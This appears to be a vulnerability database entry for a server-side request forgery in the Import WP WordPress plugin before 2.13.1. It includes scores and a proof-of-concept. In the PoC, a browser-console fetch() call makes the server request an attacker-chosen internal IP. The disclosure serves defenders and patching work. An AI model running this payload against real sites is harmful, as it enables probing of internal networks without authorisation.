Lucene search

K
wpvulndbMr EmpyWPVDB-ID:AEEFCC01-BBBF-4D86-9CFD-EA0F9A85E1A5
HistoryApr 03, 2024 - 12:00 a.m.

Import WP < 2.13.1 - Admin+ Server-side Request Forgery

2024-04-0300:00:00
Mr Empy
wpscan.com
7
wordpress plugin
ssrf vulnerability
administrator role
multisite configurations

6.8 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

Description The plugin does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.

PoC

1. As an admin, create a new importer in /wp-admin/tools.php?page=importwp 2. Visit /wp-admin/admin-ajax.php?action=rest-nonce and paste the following in your browser’s console, replace $IMPORTERID with the newly created importer’s ID, and $TARGETLOCALIP with the local IP to probe: fetch(‘/wp-json/iwp/v1/importer/$IMPORTERID/upload’, { method: ‘POST’, headers: { ‘X-WP-Nonce’: document.body.innerHTML, ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body: ‘remote_url=http%3A%2F%2F$TARGETLOCALIP%2FSSRF_PoC&filetype;=csv&action;=file_remote’, credentials: ‘include’ }) .then(response => response.text()) .then(data => console.log(data)) .catch(error => console.error(‘Fetch error:’, error));

CPENameOperatorVersion
eq2.13.1

6.8 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

Related for WPVDB-ID:AEEFCC01-BBBF-4D86-9CFD-EA0F9A85E1A5